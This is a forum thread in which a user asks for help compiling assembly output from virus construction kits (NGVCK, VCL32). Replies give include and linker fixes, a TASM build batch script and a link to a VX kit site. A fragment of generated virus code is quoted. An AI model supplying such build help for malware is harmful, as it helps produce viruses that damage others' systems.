• Registered: 2010-11-13
  • Posts: 7
  • User Karma: -1

Topic: Malware Asm Code generator

Hi,

I downloaded NGVCK,VCL,G2 and...virus construction kits for produce malware asm code that be compile easly.
But, I can't compile NGVCK or VCL32 virus correctly and I encounter some error in compile time when compile its with TASM32 and link with TLINK32.
NGVCK asm file compiled incorrect and map file is include below error:

Error: Unresolved external 'EXITPROCESS' referenced from module C:\TASM\BIN\NGVCK11.asm

and when I compile VCL32 malware asm file, below error write in map file:

Error: Unresolved external 'SLEEP' referenced from module C:\TASM\BIN\14.ASM
Error: Unresolved external 'EXITPROCESS' referenced from module C:\TASM\BIN\14.ASM

and when I analysis this exe files with anubis sandbox, I received same result for all of compiled files.

what is the reason of this errors and How change asm file to handle this errors?

thanks

Last edited by Seyyedhamzeh (2011-11-23 23:41:29)

  • XtcC
  • Member
  • Offline
  • Registered: 2011-05-19
  • Posts: 53
  • User Karma: 10

Re: Malware Asm Code generator

include windows.inc
includelib import32.lib

  • Registered: 2010-11-13
  • Posts: 7
  • User Karma: -1

Re: Malware Asm Code generator

XtcC wrote:

include windows.inc
includelib import32.lib


hi,
thanks

but NGVCK asm files doesn't has include call in code:

some lines of ngvck code are:

.586p
.model flat
jumps
.radix 16

extrn ExitProcess:PROC

.data
VirusSize equ (offset EndVirus - offset Virus )
NumberOfApis equ 10d

VirusCode:
  Virus:call   Delta                             ; Get Delta Offset

Delta:
                                        ; add esp, 4
inc esp
add esp, 3d
mov eax, dword ptr [esp-4]
                                        ; mov ebp, eax
                                        ; clear ebp
and ebp, 0
add ebp, eax
sub ebp, offset Delta
jmp KernelSearchStart

its doesn't has include calling in code...
So I have above error in map files and ngvck asm files are compiling incorrect.

where I insert inculde files calling in code sections?

Last edited by Seyyedhamzeh (2011-11-24 22:19:41)

  • slek
  • Member
  • Offline
  • Registered: 2011-01-09
  • Posts: 10
  • User Karma: 2

Re: Malware Asm Code generator

.586p
jumps
.model flat
.radix 16

include windows.inc
includelib import32.lib


That's mostly a guess^^

  • Registered: 2011-04-18
  • Posts: 39
  • User Karma: 7

Re: Malware Asm Code generator

use /ml when assembling, to enable case-sensitivity on all symbols, otherwise it defaults to uppercase and they don't match.

  • Registered: 2010-12-09
  • Posts: 56
  • User Karma: 10

Re: Malware Asm Code generator

maybe this batchscript can help you?
--
@Echo Off
if not exist %1.asm goto quit
tasm %1 /n/p/t/w/z/m4
if errorlevel 1 goto quit
tlink %1 /d/x/t
del %1.obj
:quit
--

one of my vcks is generating asm code too, take a look on this here: wink
http://vx.netlux.org/vx.php?id=tn10

+1